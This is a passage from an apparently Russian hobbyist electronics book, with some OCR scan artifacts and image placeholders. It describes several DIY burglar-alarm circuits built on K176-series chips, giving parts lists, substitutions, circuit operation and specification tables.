В электронном устройстве охраны и сигнализации применяются следующие комплектующие самодельные и покупные изделия и ЭРЭ: сетевой понижающий трансформатор питания Т1 типа ШЛ броневой конструкции; ИМС DA1 типа К176ЛА7;

транзисторы VT1 типа КТ602Б, VT2 — П217Б, VT3 — П307, VT4 — КТ315Б, VT5 — КТ361Б, VT6 — КТ315Б, VT7 — КТ361Б, VT8 — КТ816А, VT9 — КТ817А, VT10 — КТ817А, VT11 — КТ816А; выпрямительные диоды VD1 типа КД504А, VD2—VD5 типа КД202В, VD8 — Д223, VD9 — Д223; стабилитроны VD7 типа КС147А, VD6 — Д813; конденсаторы С1 типа МБМ-П-бЗОВ-0,01 мкФ, С2 — К71-4-ЦП-0,1 мкФ, СЗ — К50-6-25В-330 мкФ, С4 — К50-6-16В-2000 мкФ, С5 — К50-6-16В-500 мкФ, С6 — К50-3-16В-2000 мкФ, С7 — К50-12-6.3В 680 мкФ, С8 — К50-ЗБ-6В-1000 мкФ, С9 — К50-ЗБ-6В-16 мкФ, С10-К73-9-510 пФ, СИ — К73-9-510 пф; резисторы R1 типа ВСа-0,25-1,5 кОм, R2 — ВСа-0.25-330 Ом, R3- ВСа 0,25-510 Ом, R4- ВСа-0,25-220 Ом, R5- ВСa- 0,125- 1,0 МОм, R6 - ВСа-0,125-1,0 МОм, R7 -- ВСa- 0,125- 100 кОм, R8 ВСа-0,125-220 Ом, R9 - ВСа-0,125-1,0 МОм, R10- ВСа -0,125-1,0 МОм, R11 — ВСа-0,125-51 кОм; предохранитель плавкий F1 типа ПМ-1-0,5 А; переключатели S1 типа П1Т- 1- 1, S2- S5 чипа МП-1-1; громкоговорители (динамические головки) ВА1-ВАЗ типа 0.5ГД-50; электрический соединитель X1 типа «вилка» с электрическим кабелем с двойной изоляцией длиной 1,5...2,3 м.

При монтаже, регулировке и ремонте электронного устройства охраны и сигнализации некоторые комплектующие изделия и ЭРЭ могут быть заменены аналогичными, не ухудшающими его основные электрические параметры и эксплуатационные характеристики. Например, ИМС типа К176ЛА7 может быть заменена на микросхему типов К561ЛЕ5, К176ЛЕ5; резисторы типа ВСа можно заменить на резисторы типов МЛТ, ОМЛТ, МТ, УЛИ, С1-4; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К.50-20; выпрямительные диоды типа КД202В — на Д237А, Д226Г.

Моточные данные самодельного сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве, приведены в табл. 2.8.

Таблица 2.8. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве охраны и сигнализации на одной микросхеме

2-61.jpg

Основные электрические параметры и технические характеристики электронного устройства охраны и сигнализации на одной микросхеме

Номинальное напряжение питающей сети переменного тока, В......................... 220

Номинальная частота питающейсети переменною тока, Гц ............................ 50

Стабилизированное напряжение постоянного тика

на выходе стабилизаторов, В .............. 5 и 12

Пределы изменения напряжения питающей сети

переменною тока, % .................... —15...+10

Пределы изменения частоты питающей сети переменного тока, %....................... ± 1

Коэффициент нелинейных искажении питающей

сети неременного тока, %, не более ......... 12

Коэффициент стабилизации выходного напряжения постоянного тока, не менее:

5 В .............................. 100

12 В ............................. 150

Амплитуда пульсации выпрямленного напряжения постоянного тока, мВ, не более ............. 15

Выходное напряжение на выводах обмоток сетевого трансформатора питания Т1, В:

3 и 4 .......................... .22

5 и 6 .......................... .9,3

Ток, потребляемый устройством в режиме холостого хода, мА, не более ..................... 5

Мощность, потребляемая устройством от сети во

время работы сирены, Вт, не менее .......... 50

Время срабатывания устройства после замыкания контактов, мс, не более .................. 5

Количество одновременно охраняемых объектов, шт ............................... 2...12

Время непрерывной работы сигнала тревоги

после замыкания контактов, мин, не менее ..... 40

Сопротивление изоляции токоведущих частей устройства между собой и между проводниками и корпусом, МОм, не менее ............... 10

Срок службы устройства, ч, не менее .......... 5000

Вероятность безотказной работы при риске заказчика в =0,92, не менее ............... 0,98

Помехозащищенность устройства в металлическом корпусе при воздействии внешнего электромагнитного поля, дБ

не менее ............... 100

кпд, %, не менее ........................ 85

g11.jpg

Рис. 2.6. Принципиальная схема электронного устройства охраны и сигнализации на одной микросхеме.

Рис. 2.6. Принципиальная схема электронного устройства охраны и сигнализации на одной микросхеме.

Изображение: 

Таблица 2.8. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве охраны и сигн

Изображение: 

2. 7. Сигнальное устройство на двух микросхемах серии К176

2. 7. СИГНАЛЬНОЕ УСТРОЙСТВО НА ДВУХ МИКРОСХЕМАХ СЕРИИ К176

Рассматриваемое электронное устройство с охранной сигнализацией, выполненное на оптимальном количестве широко применяемых комплектующих ЭРИ и ЭРЭ, может эксплуатироваться в сложных климатических условиях, при повышенной относительной влажности, пониженном атмосферном давлении воздуха и повышенной температуре окружающей среды. Электронное сигнальное устройство устойчиво работает при температуре от —40 до 50 °С, относительной влажности до 98% при температуре 22 °С. и атмосферном давлении от 200 до 900 мм рт. ст.

Данное устройство предназначено для охраны жилых и производственно-хозяйственных помещений и различных транспортных средств. В последнем случае устройство работает в автономном режиме от аккумуляторной батареи. Область применения сигнального устройства может быть расширена, если вместо конечных переключателей S5—S7 проложить проволочный шлейф по периметру охраняемого объекта. При этом общая длина шлейфа из провода диаметром до 0, 12 мм может быть увеличена до 0, 5 км. В зависимости от конструктивного исполнения охранное устройство позволяет подключать к его входам микроминиатюрные датчики, световые и звуковые сигнализаторы, проволочный шлейф. Достаточная простота схемно-технического решения, минимальное количество комплектующих изделий и ЭРЭ общего назначения, несложное конструктивно-технологическое решение и небольшая стоимость изготовления делают данное устройство доступным для повторения начинающими радиолюбителями, оно может быть рекомендовано к тиражированию в цехах малых предприятий, акционерных обществ и производственных кооперативов.

Принципиальная электрическая схема охранного сигнального устройства бытового назначения, выполненного на двух ИМС серии К176, приведена на рис. 2. 7. Как следует из схемы, сигнальное устройство включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, автономный источник электропитания GB1, выпрямительное устройство нерегулируемого типа, которое работает на емкостный фильтр, ПСН, электронное сигнальное устройство, собранное на двух ИМС, выходные цепи и АС тревожной сигнализации.

Входное устройство содержит электрический соединитель X1 типа «вилка», смонтированный с электрическим кабелем с двойной изоляцией и длиной не менее 1, 5 м. Вилка обеспечивает подключение к стандартной розетке электрической сети переменного тока напряжением 220 В частотой 50 Гц. Плавкий предохранитель F1, установленный на входе, защищает электрические цепи устройства от перегрузок и коротких замыканий. Индикаторная лампа Н2 тлеющего разряда и лампа накаливания H1, установленные параллельно первичной и вторичной обмоткам трансформатора, сигнализируют о готовности охранного устройства к работе. Малогабаритные зажимные клеммы Х2 и ХЗ служат для подключения автономного источника питания постоянного тока напряжением 9 В.

Сетевой понижающий трансформатор питания Т1 изготавливается на магнитопроводе типа Ш или ШЛ броневой конструкции с одной катушкой, которая устанавливается на центральном стержне магнитопровода. Активная площадь поперечного сечения стали маг-нитопровода должна быть не менее 3 см2. На катушку с жестким каркасом наматывается провод в эмалированной изоляции повышенной электрической прочности рядовой намоткой с прокладками из кабельной бумаги как между рядами, так и между обмотками. В качестве изоляции можно использовать также лакоткань или конденсаторную бумагу толщиной до 0, 05 мм. Самодельный трансформатор питания должен быть изготовлен в полном соответствии с данными, приведенными в табл. 2. 9. В сигнальном устройстве можно использовать готовый покупной унифицированный трансформатор серии «Габарит» или трансформаторы типов ТА, ТН, ТАН, ТПП, ТС, ТТ с соответствующими выходными параметрами и техническими характеристиками.

Сетевой понижающий трансформатор формирует на выходных обмотках напряжение переменного тока низкого напряжения, соответствующее расчетному выходному напряжению выпрямителя. Трансформатор обеспечивает полную гальваническую развязку вторичных цепей электронной схемы от высокого напряжения сети переменного тока. Низкое выходное напряжение питания узлов схемы обеспечивает дополнительную электробезопасность при эксплуатации устройства.

Выпрямитель нерегулируемого типа собран по схеме Греца по однофазной двухполупериодной мостовой схеме на четырех выпрямительных диодах VD1—VD4 средней мощности. Выпрямитель работает на емкостную нагрузку на конденсаторе С1, обеспечивает повышенную частоту пульсации выпрямленного напряжения постоянного тока, хорошее использование габаритной мощности трансформатора питания, низкое обратное напряжение на комп-

Таблица 2. 9. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сигнальном устройстве на двух микросхемах серии К176

2-71.jpg

лекте выпрямительных диодов, но имеет повышенное падение напряжения на диодах, снижающее общий кпд устройства. Диоды данного выпрямителя нельзя установить на общий радиатор охлаждения без изоляционных прокладок. Выпрямитель защищен от перегрузок плавким предохранителем F2.

Выпрямленное и сглаженное фильтром С1 постоянное напряжение подается на нерегулируемый стабилизатор напряжения параметрического типа, собранный на стабилитроне VD5, мощном низкочастотном транзисторе VT1 и резисторе R1. На выходе параметрического стабилизатора действует напряжение, равное 9 В. Аккумуляторная батарея или внешний источник включается при автономном режиме работы однополюсным переключателем S2.

Собственно сигнальное устройство собрано на двух ИМС DA1, DA2, двух биполярных транзисторах VT2, VT3 и выпрямительных диодах VD6—VD11, которые выполняют различные функции в электронной схеме. Звуковой сигнал тревоги подается при замыкании контактов переключателя S4 или при размыкании контактов микропереключателей S5—S7, устанавливаемых скрытно на

охраняемых объектах. Включение сигнального устройства в работу осуществляется сначала переключателем S1 и затем переключателем S3 при электропитании от сети переменного тока и переключателями S2 и S3 при питании от автономного источника. После замыкания контактов этих переключателей начинает заряжаться конденсатор С6 через резистор R4. Напряжение с резистора R4 подается на вход ИМС DA1 (вход 2 инвертора) и на R-входы второй ИМС DA2, которые переходят в положение низкого уровня логического нуля.

ИМС имеют в своем составе следующие функциональные элементы: ИМС DA1 состоит из четырех логических элементов 2ИЛИ-НЕ, ИМС DA2 — из двух триггеров 0-типа.

Конденсаторы СЗ и С4 заряжаются через диоды VD7, VD8 напряжением, поступающим с инверторного выхода ИМС DA2 (вывод 2), уровень на котором устанавливается как логическая единица. Во время зарядки конденсаторов СЗ и С4 замыкание контактов переключателя S4 не приводит к срабатыванию сигнального устройства. После зарядки конденсаторов СЗ, С4 сигнальное устройство переходит в дежурный режим. В это время на входе ИМС DA1 и R-входах схемы DA2 устанавливается низкий уровень, соответствующий логическому нулю.

При замыкании контактов переключателя S4 на выходе ИМС DA1 (вывод 3) появится высокий уровень логической единицы, напряжение с которого переключит первый триггер ИМС DA2, так как на его входе (вывод 1) нет удерживающего напряжения. Конденсаторы СЗ и С4 начинают разряжаться через резисторы R6 и R.7. Напряжение на выводе 8 ИМС DA1 уменьшится до нуля, что приводит к включению мультивибратора, собранного по схеме ИЛИ-НЕ (выводы 8.. .13), в цепь которого включен времязадающий конденсатор С7. С выхода мультивибратора импульсы поступают на счетный вход триггера ИМС DA2 (вывод 11). С выхода второго триггера (вывод 13) ИМС DA2 сигналы подаются на базу транзистора VT3, который включен как эмиттерный повторитель. Далее с нагрузочного резистора R3 импульсное напряжение поступает на транзистор VT2, который работает в выходном каскаде и нагрузкой которого является АС. Конденсатор СЗ разряжается до нуля, что приводит к появлению на выходе инвертора ИМС DAI (вывод 4) высокого уровня логической единицы, напряжение с которою через диод VD11 воздействует на R-входы обоих триггеров ИМС DA2.

Триггеры устанавливаются в нулевое положение, и конденсаторы СЗ и С4 вновь заряжаются. На выходе инвертора ИМС DА1 снова появляется низкий уровень логического нуля. Процесс возврата в это состояние происходит автоматически в течение заданного времени (примерно 3...3,5 мин), после чего сигнальное устройство возвращается в дежурный режим работы.

Как указывалось ранее, в сигнальном устройстве для скрытного установления датчиков кроме нормально разомкнутых контактов переключателя S4 имеется ряд нормально замкнутых контактов, работающих на обрыв электрической цепи.

При изготовлении сигнального устройства рекомендуется применить блочный вариант включения исполнительных устройств. В первую очередь всю электронную часть устройства необходимо выполнить как БЭ, изготовив его в виде самостоятельной сборочной единицы, и предусмотреть три входа для включения датчиков различного типа и назначения.

Первый вход должен быть предназначен для работы с датчиком S4, который устанавливается на входной двери охраняемого объекта и обеспечивает задержку включения сигнала тревоги, что позволяет владельцу отключить сирену при входе в помещение выключателем S3, установленным в скрытом месте, и тем самым избежать ложной тревоги.

Второй вход предназначен для работы с датчиками S5—S7, размещенными на окнах, внутренних дверях, сейфах и т. д. Срабатывание устройства от сигналов этих датчиков происходит мгновенно.

Третий вход — для подключения шлейфного датчика, который устанавливается в том случае, если не применяются датчики S5—S7. Шлейфный датчик представляет собой тонкий провод (фольгу), натянутый по периметру охраняемого помещения или наклеенный на стекла окон. Обрыв этого провода (фольги) приводит к мгновенному срабатыванию устройства.

Второй и третий входы должны быть конструктивно объединены для того, чтобы предотвратить ложные срабатывания.

На выходе устройства необходимо предусмотреть возможность подключения блока громкоговорителей.

Переключатели (датчики) S5—S7 могут быть установлены в различных местах охраняемых объектов. При размыкании любого контакта одного из этих датчиков на выходе первого триггера ИМС DA2 (вывод 6) появляется высокий уровень логической единицы, а конденсатор СЗ начинает разряжаться до нуля, включая питание мультивибратора. Сигнальное устройство включается на подачу акустических сигналов с промежутками неограниченно долгими. В дежурный режим работы устройство возвращается после замыкания ранее разомкнутой цепи и после полного разряда конденсатора СЗ.

В рассматриваемом сигнальном устройстве применяются следующие комплектующие самодельные и покупные ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания T1 типа ШЛ броневой конструкции; ИМС DA1 типа К176ЛЕ5, DA2 — К176ТМ2; транзисторы VT1 типа КТ815А, VT2 — КТ801Б, VT3 — КТ315Б; выпрямительные диоды VD1—VD4 типа Д237А, VD6—VD11 типа Д220; стабилитрон VD5 типа Д814Б;

конденсаторы С1 типа К50-6-16В-1000 мкФ, С2 — МБМ-11-160В-0.033 мкФ, СЗ — К52-5-16В-47 мкФ, С4 — К52-5-16В-22 мкФ, С5 — К10-7В-0,1 мкФ, С6 — К50-16-16В-100 мкФ, С7 — К10-7В-50В-Н70-0.22 мкФ; резисторы R1 типа МЛТ-0,5-360 Ом, R2 — МЛТ-0,25-390 Ом, R3 — МЛТ-0,25-3 кОм, R4 — МЛТ-0,5-270 кОм, R5 — МЛТ-0,25-20 кОм, R6 — МЛТ-0,25-560 кОм, R7 — МЛТ-0,25-3,3 МОм, R8 — МЛТ-0,25-820 кОм, R9 — МЛТ-0,25-20 кОм, R10 — МЛТ-0,25-10 кОм, R11 — МЛТ-0,25-2 кОм, R12 — МЛТ-0,25-1,5 МОм; переключатели S1 типа П2Т-1-1, S2 — П1T-1-1, S3—S7 типа МПЗ-1; предохранители F1, F2 плавкие типа ВПБ6-1; индикаторные лампы H1 типа МН-6,3-0,22А, Н2 — ТН-2; электрические соединители X1 типа «вилка» с электрическим кабелем, имеющим двойную изоляцию, Х2, ХЗ типа КМЗ-1; излучающие головки громкоговорителей BA1, BA2 типа ЗГД-38Е; аккумуляторная батарея GB1 типа 11ЦНК-0.45.

При монтаже, регулировке и ремонте сигнального устройства некоторые типы комплектующих ЭРИ и ЭРЭ могут быть заменены другими аналогичными, не ухудшающими основные электрические параметры устройства и его эксплуатационные характеристики. Например, резисторы типа МЛТ можно заменить на резисторы типов ВСа, ВС, ОМЛТ, КИМ, С2-6, С1-8; оксидные электролитические конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20; выпрямительные диоды типа Д237А — на Д226, КД105А, КД205К; диоды типа Д220 — на Д220А,

КД510А, КД521Л; стабилитрон типа Д814Б - на Д815Г, Д818А. При сборке и монтаже устройства обеспечивается защита всех элементов схемы изоляционными лаками от воздействия внешних климатических факторов, а также от воздействия статического электричества.

Основные электрические параметры и технические характеристики сигнального устройства на двух микросхемах серии К176

Номинальное напряжение питающей сети

переменного тока,В ....................... .220

Номинальная частота питающей сети переменного тика, Гц ........................ .50

Номинальное напряжение автономного источника

питания постоянного тока, В .............. .9

Пределы изменения напряжения питающей сети

переменного тока, % ................... .—15...+10

Пределы изменения частоты питающей сети неременного тика, % ..................... .±1

Пределы изменения напряжения автономного

источника питания, В ................... .7...12

Выходное напряжение на выводах обмоток сетевого понижающего трансформатора Т1, В:

4 и 5 ............................ .9,1

6 и 7 ............................ .6,2

Выходное стабилизированное напряжение, В ..... .9

Коэффициент стабилизации напряжения постоянного тока на выходе стабилизатора, не менее . . . .100

Амплитуда пульсации выпрямленного напряжения, мВ, не более ......................... .15

Ток, потребляемый устройством в дежурном режиме работы от сети переменного тока, мА, не более ............................ .10

Выходная мощность звуковою сигнала, Вт ...... .4

Ток, потребляемый устройством в дежурном режиме работы от автономного источника питания, мкА, не более ........................ .30

Мощность, потребляемая устройством от сети в

дежурном режиме работы, Вт ............. .0,1

Время подачи звукового сигнала в рабочем режиме работы, мин, не менее .............. .3,5

Длина периметра установки шлейфа или переключателей S5—S7 при монтаже проводом в эмалированной изоляции диаметром 0,12 мм, м, не менее ............................ .500

Время задержки подачи звукового сигнала после замыкания контактов переключателя S4, с, не менее ............................ .10

Вероятность безотказной работы устройства при

риске заказчика в=0,92, не менее .......... .0,98

Срок службы устройства, ч, не менее ......... .10 000

Помехозащищенность устройства при напряженности внешнего электрического поля в полосе частот 0.15...30 МГц, дБ ...................... .120

То же к сетевым помехам, дБ, не менее ........ 80

То же к магнитным помехам, дБ, не менее ...... 100

Сопротивление изоляции токоведущих частей устройства относи тельно металлического корпуса, МОм, не менее ........... 10 кпд, %, не менее ........................ 75

g21.jpg

Рис. 2.7. Принципиальная схема сигнального устройства на двух микросхемах серии К 176

Рис. 2.7. Принципиальная схема сигнального устройства на двух микросхемах серии К 176

Изображение: 

Таблица 2. 9. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сигнальном устройстве на двух микр

Изображение: 

2. 8. Электронное охранное устройство для приусадебного участка

2. 8. ЭЛЕКТРОННОЕ ОХРАННОЕ УСТРОЙСТВО ДЛЯ ПРИУСАДЕБНОГО УЧАСТКА

Это охранное устройство является частью системы, разработанной для установки на садово-огородных и приусадебных участках для одновременной охраны сразу нескольких близко расположенных друг от друга помещений и объектов: дома, гаража, хозблока, погреба, стационарного наружного термостата для хранения различных сельскохозяйственных продуктов, сарая, курятника и др. Данное универсальное устройство обеспечивает полную сохранность имущества, работая в комплекте с другими устройствами, передающими информацию на центральный пульт. Электронное устройство срабатывает при проникновении постороннего лица на охраняемый объект или в помещение, подавая либо звуковой, либо световой сигнал тревоги, либо передавая электромагнитный сигнал на обслуживаемый общий пульт управления. Если вместо микропереключателей S1—S4, работающих на размыкание, проложить тонкий обмоточный эмалированный провод диаметром 0, 08... 0, 12 мм по периметру охраняемого объекта, то обрыв его в любой точке также приводит к срабатыванию сторожевого устройства.

Принципиальная электрическая схема охранного устройства, выполненная на минимальном количестве комплектующих ЭРЭ, приведена на рис. 2. 8. Конструктивно охранное устройство рекомендуется изготовить в виде двух функциональных сборочных единиц: БП и блока электронного управления. Блок электропитания работает от сети переменного тока напряжением 220 В частотой 50 Гц и, как видно из принципиальной схемы, в свою очередь состоит из входных цепей, сетевого понижающего трансформатора питания T1, выпрямителя, работающего на емкостный фильтр, и электронного стабилизатора напряжения. Электронный блок управления включает в свой состав две ИМС DA1 и DA2, комплект концевых микровыключателей и ИМ любого принципа действия, например электромагнитное или электронное реле или радиоизлучатель.

Входные цепи электронного сторожа обеспечивают подключение его к сети переменного тока с помощью электрического соединителя X1 типа «вилка», смонтированною с электрическим кабелем, имеющим повышенное сопротивление изоляции; обеспечивают предохранение элементов схемы от коротких замыкании и перегрузок с помощью плавкого предохранителя F1; обеспечивают сигнализацию о готовности устройства к эксплуатации с помощью индикаторной лампы H1 тлеющего разряда, включенной в сеть переменного тока. Включение электропитания осуществляется переключателем В1.

Сетевой понижающий трансформатор питания Т1 изготавливается на броневом ленточном магнитопроводе типа ШЛ. В данном случае в сторожевом устройстве использован унифицированный трансформатор типа ТН2-127/220-50. Сетевой трансформатор обеспечивает расчетный уровень выпрямленного напряжения, полную гальваническую развязку вторичных цепей охранного устройства от сети высокого напряжения переменного тока, а также дополнительную электробезопасность при эксплуатации. Первичная обмотка трансформатора рассчитана на подключение к сети переменного тока напряжением 220 или 127 В частотой 50 Гц. На вторичной обмотке сетевого трансформатора действует переменное напряжение в режиме нагрузки: 6, 3; 5, 0; 1, 3 В (выводы 7 и 8, 9 и 10, 10 и 11 соответственно). Для изготовления самодельного трансформатора в табл. 2. 10 приведены все необходимые сведения. При изготовлении трансформатора надо особое внимание уделить изоляции рядов обмоточного провода как между собой, так и между обмотками, а также пропитке изоляционными лаками.

Выпрямитель собран по однофазной двухполупериодной мостовой схеме на четырех выпрямительных диодах VD1—VD4. Выпрямитель обеспечивает на выходе постоянное напряжение 9 В. Вместо четырех диодов можно использовать одну диодную сборку типа КЦ, которая значительно улучшает технологичность изготовления БП и характеризуется среди других выпрямительных схем улучшенными параметрами постоянного тока. К достоинствам данной мостовой схемы, следует отнести повышенную частоту пульсации выпрямленного напряжения

Таблица 2. 10. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном охранном устройстве для приусадебного участка

2-81.jpg

постоянного тока, хорошее использование габаритной мощности сетевого трансформатора, пониженное обратное напряжение на комплекте выпрямительных диодов. Однако мостовые схемы выпрямления тока имеют и некоторые недостатки. Это, в первую очередь, повышенные потери, более низкий кпд, большое количество примененных диодов, повышенная стоимость изготовления, невозможность установки диодов на одном радиаторе охлаждения без изоляционных прокладок (если не применяется диодная сборка). Для увеличения выходной мощности выпрямительного устройства можно использовать аналогичные диоды большей мощности.

В случае отсутствия на садово-огородном участке сетевого напряжения переменного тока в сторожевом устройстве предусматривается электропитание от встроенного или внешнего автономного источника питания постоянного тока, имеющего выходное напряжение 9 В.

Электронная часть охранного устройства собрана на двух ИМС DA1 и DA2 серии К176, которые имеют в своем составе два триггера (выводы 8, 9, 10 и 11, 12, 13); компараторы напряжения и инверторы. В ИМС DA1 компаратор имеет выводы 1, 2 и 3. С такими же выводами работает компаратор ИМС. DA2.

Следует заметить, что компаратор в данном случае является устройством, включенным по схеме ИП для сравнения измеряемой величины с эталоном, а инвертор устройством, преобразующим сигнал низкого уровня логического нуля на входе в сигнал высокого уровня логической единицы на выходе и наоборот, что эквивалентно операции отрицания.

Использование ИМС данной серии (КМОП) позволяет охранному устройству иметь значительный запас времени эксплуатации от автономного источника электропитания, так как в дежурном режиме потребление энергии не превышает 4 мкА.

В дежурный режим работы устройство устанавливается переключателями В1 и В2 типа «тумблер» в зависимости от источника питания. После включения напряжение поступает на конденсатор С5 и начинается его зарядка через резистор R4. В это время на входе первого компаратора напряжения ИМС DA1 (выводы 1 и 2) действует высокий уровень логической единицы, а на его выходе (вывод 3) — низкий уровень логического нуля. До тех пор пока контакты конечных выключателей S1— S4 замкнуты, на выходе инвертора ИМС DA1 (выводы 4, 5, 6) будет высокий уровень и триггер ИМС установится в такое положение, когда на его выходе (вывод 10) будет низкий уровень — уровень логического нуля. В этом случае на выходе группы параллельно включенных инверторов второй ИМС (выводы 4, 5, 6 и 11, 12, 13} появится также низкий уровень, светодиод оптрона VТ4 будет выключен, фотодинистор закрыт и исполнительное устройство К1 обесточено. Пока конденсатор С4 не зарядится, устройство при замкнутых контактах выключателей S1S4 находится в режиме подготовки к эксплуатации. Время зарядки конденсатора С4 регулируется в достаточно широких пределах — от 0 до 45 с, в течение которого исполнительное устройство остается отключенным. Если устройство установлено на входной двери, то за указанное время необходимо выйти из помещения и закрыть дверь. Таким образом, в пределах времени зарядки конденсатора С4 контакты переключателей S1— S4 можно размыкать и замыкать сколько угодно раз, при этом состояние триггера первой ИМС не изменится

и сигнал тревоги не прозвучит, так как не будет подано напряжение на исполнительное устройство. После зарядки конденсатора С4 до напряжения питания на выходе компаратора первой ИМС DA1 (выводы 1, 2, 3) появится высокий уровень логической единицы и охранное устройство будет готово реагировать на разомкнутое положение контактов переключателей S1—S4.

При проникновении на охраняемый объект постороннего лица и размыкании одной пары контактов конечных выключателей S2—S4 первый триггер ИМС переключится, а на выходе (вывод 10) появится высокий уровень логической единицы. С этого момента начинается зарядка конденсатора С5 через резистор R4, в течение которой исполнительное устройство остается включенным. И в это же время начинается зарядка конденсатора С4 и снова триггер не реагирует на изменение состояния контактов S1—S4. Следовательно, закрыванием двери после несанкционированного проникновения внутрь помещения уже нельзя предотвратить подачу сигнала тревоги. После окончания зарядки конденсатора С5 происходит смена логического уровня на выходе компаратора второй ИМС и выходе, включающем оптрон, который в свою очередь включает и приводит в действие ИМ сигнализации. Для того чтобы тревожная сигнализация была отключена, надо в период зарядки конденсатора С4 (20... 45 с) после открывания дверей или другого объекта отключить БП от сети переменного тока или питание от автономной батареи. Выключатели электропитания В1 и В2 необходимо размещать в скрытом от посторонних лиц месте, о котором должны знать только члены семьи или дежурные на объектах охраны.

Монтаж сторожевого устройства рекомендуется осуществлять на односторонней печатной плате, размеры которой не превышают 120Х80 мм, использовав для пайки припой марки ПОС-60. В качестве ИМ К1 может быть использовано реле электромагнитной системы, управляемый магнит, соленоид или другое устройство с электромеханическим приводом. Переключатели S1—S4 с контактными парами могут быть любой конструкции, но они должны быть такими, чтобы их можно было закрепить на дверях или окнах охраняемых объектов. Хорошие результаты могут быть получены при применении магнитоуправляемых контактов, герконовых реле, которые имеют соответствующую арматуру для крепления и установки. Могут быть применены также контакты, широко используемые в промышленных

системах охранной сигнализации. Рассматриваемое охранное устройство допускает подключение практически неограниченного числа пар контактов, расположенных в различных частях приусадебного участка. При этом все пары контактов соединяются последовательно. В случае обрыва соединительных проводов от той или иной пары контактов электронное устройство тотчас же подаст сигнал тревоги.

Перечень основных покупных комплектующих ЭРИ и ЭРЭ, применяющихся в электронном охранном устройстве, и рекомендации по их замене приведены в табл. 2. 11.

Таблица 2.11. Перечень основных комплектующих ЭРИ и ЭРЭ, применяющихся в электронном сторожевом устройстве, и их возможная замена

2-82.jpg

Окончание табл. 2.11

2-83.jpg

Основные электрические параметры и технические характеристики электронного охранного устройства для приусадебного участка

Номинальное напряжение питающей сети переменного тока, В.......................... 220 или 127

Номинальная частота питающей сети переменного тока, Гц............................. 50

Номинальное напряжение автономного источника

питания постоянного тока, В .............. .9

Напряжение на выводах вторичных обмоток сетевого понижающего трансформатора Т1, В:

7 и 8 ............................ .6,3

9 и 10 ............................ .5

10 и 11 ........................... .1,3

Пределы изменения напряжения питающей сети

переменного тока, В .................... .187...242 или 110...140

Пределы изменения частоты питающей сети переменного тока, Гц ...................... .49...51

Пределы изменения напряжения автономного источника питания постоянного тока, В ........ .8...12

Количество элементов ХИТ типа А373 в автономном источнике питания, шт ............... .6

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .12

Коэффициент стабилизации постоянного тока на

выходе БП, не менее ................... .120

Максимальное количество охраняемых объектов, шт . . 20

Время задержки срабатывания устройства после

размыкания контактов конечных выключателей, с . . 1...45

Ток, потребляемый устройством от сети переменного напряжения в дежурном режиме работы, мА, не более .......................... 10

То же, при работе от автономного источника питания, мкА, не более ................... .20

Максимальная мощность устройства, при работе

исполнительных устройств,Вт .............. 15

Сопротивление изоляции токоведущих частей устройства между собой и корпусом, МОм, не менее ......................... 10

Помехозащищенность, устройства при напряженности внешнего электоромагнитного поля, дБ, не менее .....................100

кпд, %, не менее .....................78

k1.jpg

Рис. 2.8. Принципиальная схема электронного охранного устройства для приусадебного участка.

Рис. 2.8. Принципиальная схема электронного охранного устройства для приусадебного участка.

Изображение: 

Таблица 2. 10. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном охранном устройстве д

Изображение: 

Таблица 2.11. Перечень основных комплектующих ЭРИ и ЭРЭ, применяющихся в электронном сторожевом устройстве, и их возможная замен

Изображение: 

Таблица 2.11. Перечень основных комплектующих ЭРИ и ЭРЭ, применяющихся в электронном сторожевом устройстве, и их возможная замен

Изображение: 

2. 9. Охранное устройство с универсальным выходом

2.9. ОХРАННОЕ УСТРОЙСТВО

С УНИВЕРСАЛЬНЫМ ВЫХОДОМ

Данное охранное устройство, устанавливаемое на разнообразных объектах бытового и промышленного назначения, отличается от других подобных устройств практически неограниченными возможностями подключения исполнительных электронных и электромеханических устройств и приборов различного принципа действия. К ним в первую очередь относятся устройства звукового оповещения с параллельным включением громкоговорителей мощностью 5 Вт и более, световые или комбинированные звуковые и световые сигнализаторы, тяговые магниты, соленоиды, электротехнические механизмы. Рассматриваемое охранное устройство может выдавать с помощью ИМ сигналы необходимого вида.

Это электронное охранное устройство, целиком выполненное на ППП и ИМС, предназначено для работы в помещениях и закрытых объемах, а также на открытых площадках в условиях УХЛ при жестких воздействиях внешних климатических и механических нагрузок. Устройство устойчиво работает при температуре окружающей среды от —30 до 50 °С, при относительной влажности воздуха до 93% при температуре до 25 °С и пониженном атмосферном давлении до 5 мм рт. ст.

Охранное устройство может устанавливаться в жилых помещениях в городах, поселках, на садово-огородных и приусадебных участках, в офисах, гаражах, складах, хозяйственных постройках, на подвижном транспорте, яхтах, катерах и многой другой личной и частной собственности.

Принципиальная электрическая схема охранного устройства приведена на рис. 2. 9. Устройство изготавливается промышленным способом на государственном предприятии в виде системы предупредительной сигнализации, в комплект поставки которой входят самостоятельные сборочные единицы, узлы и блоки: БП, БЭ, сигнальные цепи и исполнительные устройства. Как видно из схемы, БП в свою очередь состоит из входных цепей, сетевого понижающего трансформатора питания Т1, выпрямительного устройства, собранного по мостовой схеме, емкостного фильтра, СНПТ и защитного устройства.

На входе охранного устройства установлены плавкий предохранитель F1, обеспечивающий защиту входных цепей от перегрузок и коротких замыкании, которые возможны при ошибках в монтаже и из-за неисправности комплектующих ЭРИ и ЭРЭ; индикаторная лампа H1 тлеющего разряда, сигнализирующая о готовности устройства к эксплуатации и о том, что напряжение переменного тока подано на сетевой трансформатор T1; однополюсный переключатель В1 типа «тумблер» для включения питания сети; электрический соединитель X1 типа «вилка» с электрическим кабелем длиной не менее 1, 5 м;

емкостный сетевой фильтр, собранный на конденсаторах С1 и С2, защищающий от помех, которые проникают в сеть питания.

